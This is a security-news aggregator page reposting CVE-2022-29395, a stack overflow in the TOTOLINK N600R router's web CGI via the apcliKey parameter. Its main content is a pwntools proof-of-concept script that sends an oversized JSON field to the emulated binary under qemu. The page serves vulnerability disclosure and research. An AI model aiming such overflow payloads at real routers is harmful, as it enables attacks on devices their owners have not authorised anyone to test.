Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-29395: IoT-vuln/Totolink/6.setWiFiRepeaterConfig at main · d1tto/IoT-vuln

TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the apcliKey parameter in the function FUN_0041bac4.

CVE
#vulnerability#web#js#auth#wifi

The vulnerability exists in the router’s WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_0041bac4 (at address 0x041bac4) gets the JSON parameter apcliKey, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

from pwn import * import json

data = { "topicurl": "setting/setWiFiRepeaterConfig", "operationMode": "2", "apcliAuthMode": "WEP", "apcliKeyFormat": "0", "apcliKey": 'A’*0x200, "ipAddress": “192.168.2.1” }

data = json.dumps(data) print(data)

argv = [ "qemu-mips-static", "-g", "1234", "-L", "./lib", "-E", "LD_PRELOAD=./hook.so", "-E", "CONTENT_LENGTH={}".format(len(data)), "-E", "REMOTE_ADDR=192.168.2.1", “./cstecgi.cgi” ]

a = process(argv=argv)

a.sendline(data.encode())

a.interactive()

Related news

CVE-2022-29395: IoT-vuln/Totolink/6.setWiFiRepeaterConfig at main · d1tto/IoT-vuln

TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the apcliKey parameter in the function FUN_0041bac4.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907